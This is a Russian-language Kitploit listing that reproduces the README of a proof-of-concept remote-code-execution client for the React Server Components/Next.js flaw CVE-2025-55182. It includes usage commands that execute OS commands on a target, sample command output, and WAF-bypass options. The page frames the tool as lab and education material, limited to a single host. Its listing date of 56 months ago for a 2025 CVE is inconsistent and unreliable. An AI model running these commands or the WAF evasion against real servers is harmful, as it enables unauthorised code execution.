Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell-scanner — Точное обнаружение уязвимостей удаленного выполнения кода в RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Инструменты/GitHubGitHub/hidden-investigations/react2shell-scanner
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеОбучение и Образование
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Точное обнаружение уязвимостей удаленного выполнения кода в RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт
56 месяцев назадЕщё не проверено

Сканер React2Shell – с PoC

CVE-2025-55182 – PoC RCE для React Server Components
Обучающий эксплойт-клиент для лаборатории React2Shell от Hidden Investigations.

Этот репозиторий содержит эксплойт-инструмент уровня proof-of-concept (PoC) для одного хоста, предназначенный для уязвимости React2Shell (CVE-2025-55182), нацеленной на некорректно сконфигурированные приложения React Server Components / Next.js.

Он предназначен для использования только против официальной лаборатории React2Shell от Hidden Investigations или систем, которыми вы явно владеете / которые администрируете.


⚠️ Юридический и этический отказ от ответственности

Этот проект предоставляется строго для образовательных и защитных исследований безопасности:

  • Используйте этот инструмент только на:
    • Официальной лаборатории Hidden Investigations React2Shell, или
    • Системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
  • Не направляйте его на случайные веб-сайты, боевые системы или инфраструктуру, которой вы не управляете.
  • Авторы и Hidden Investigations не несут ответственности за неправомерное использование или ущерб.

Используя этот инструмент, вы соглашаетесь соблюдать все применимые законы и нормативные требования.


Возможности

  • 🔥 Эксплойт-клиент React2Shell для CVE-2025-55182
  • 🎯 Ориентированность на один хост (без массового сканирования)
  • 📡 Поддержка произвольных путей и списков путей
  • 🧪 Режим безопасной проверки (без OS-команд, только детектирующий зонд)
  • 🪟 Дружественный к Windows режим (по умолчанию whoami)
  • 🛡️ Помощники обхода WAF:
    • Мусорное multipart-поле (--waf-bypass, --waf-bypass-size)
    • Изменение раскладки Vercel (--vercel-waf-bypass)
  • 🔐 Параметры TLS (--insecure, пользовательские заголовки)
  • 🧾 Вывод в JSON (-o/--output, --all-results)
  • 🧘 Чистый вывод в тихом режиме (отлично подходит для передачи в другие инструменты)

Требования

  • Python: 3.8+ (проверено на Python 3.10+)
  • Зависимости:
    • requests

Установите зависимости через:

root@kitploit:~
pip install -r requirements.txt

Установка

  1. Клонируйте репозиторий Hidden Investigations:
root@kitploit:~
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
  1. (Необязательно, но рекомендуется) Создайте виртуальное окружение:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate   # On Windows: venv\Scripts\activate
  1. Установите зависимости:
root@kitploit:~
pip install -r requirements.txt
  1. Запустите инструмент:
root@kitploit:~
python3 react2shell-scanner.py -h

Использование

Базовая справка:

root@kitploit:~
python3 react2shell-scanner.py -h

Инструменту требуется целевой URL:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
# or
python3 react2shell-scanner.py --url http://localhost:3000 -c "id"

Если запустить его без -t/--target или -u/--url, он выведет фирменное справочное сообщение и завершится.


Параметры командной строки

Цель и пути

Примечание: Этот PoC только для одного хоста. Опция -l/--list присутствует, но намеренно отключена.


Поведение эксплойта / полезной нагрузки


Параметры HTTP / TLS


Параметры вывода / интерфейса

Пример тихого режима (удобный многострочный вывод):

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"

Вывод:

root@kitploit:~
total 12
drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
-rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
-rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js

Флаги массового сканирования (намеренно отключены)

Следующие флаги существуют для зеркалирования CLI Assetnote, но не реализованы в этом PoC, чтобы избежать злоупотребления массовым сканированием:

OptionStatus
-l, --listНе реализовано
--threads NНе реализовано

Если вы используете -l/--list, инструмент выведет предупреждение и завершится, предлагая использовать оригинальный react2shell-scanner от Assetnote для безопасного крупномасштабного сканирования.


Примеры

Запуск против локальной лаборатории:

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"

Использование обхода WAF с большим мусорным полем:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"

Несколько путей на одном хосте:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"

Пути из файла:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"

Режим безопасной проверки (без выполнения OS-команд):

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 --safe-check

Вывод результатов в JSON-файл:

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results

Формат JSON-вывода

При использовании -o/--output инструмент записывает массив объектов, например:

root@kitploit:~
[
  {
    "url": "http://localhost:3000/",
    "path": "/",
    "success": true,
    "status": "success",
    "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
    "http": {
      "status_code": 302,
      "headers": {
        "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
        "...": "..."
      }
    }
  }
]

Авторы и благодарности

  • Hidden Investigations – за публикацию образовательной лаборатории React2Shell и PoC-клиента.
  • @sakibulalikhan – автор инструмента.
  • Assetnote – вдохновение для идей обхода WAF через их react2shell-scanner.

Лицензия

Этот проект распространяется под лицензией MIT. Подробности см. в LICENSE.

📬 Свяжитесь с нами: [email protected]

Скачать инструмент
OptionDescriptionDefault
-t, --targetЦелевой URL или домен (обязательно, если не используется --url)None
-u, --urlПсевдоним для --target (флаг в стиле Assetnote)None
--pathПуть для проверки (можно указывать несколько раз, например /, /_next)/
--path-fileФайл с путями для проверки (по одному на строку)None
OptionDescriptionDefault
-c, --commandКоманда для выполнения на цели (в случае успешной эксплуатации)id
--safe-checkИспользовать полезную нагрузку SAFE_CHECK (без OS-команды, только строка-маркер)off
--windowsАдаптировать значения по умолчанию для Windows-целей (например, использовать whoami, когда команда id)off
--waf-bypassДобавлять большое мусорное multipart-поле в начало тела запроса для обхода WAFoff
--waf-bypass-size KBРазмер мусорного поля в КБ при использовании --waf-bypass128
--vercel-waf-bypassИспользовать альтернативную multipart-раскладку для изменения поведения WAF Vercel (упрощённый PoC)off
OptionDescriptionDefault
--timeout SECONDSТаймаут запроса в секундах15 (или 20, если задан --waf-bypass и таймаут не указан)
-k, --insecureОтключить проверку SSL (как curl -k)off
-H, --headerПользовательский заголовок, напр. -H "X-Forwarded-For: 127.0.0.1" (можно повторять)None
OptionDescriptionDefault
-o, --output FILEЗаписать JSON-результаты в FILENone
--all-resultsПри использовании --output включать также неуязвимые результатыoff
-v, --verboseПодробный режим – показывать HTTP-статус и заголовок X-Action-Redirectoff
-q, --quietТихий режим – при успехе выводить только нормализованный вывод командыoff
--no-colorОтключить цветной вывод в терминалеoff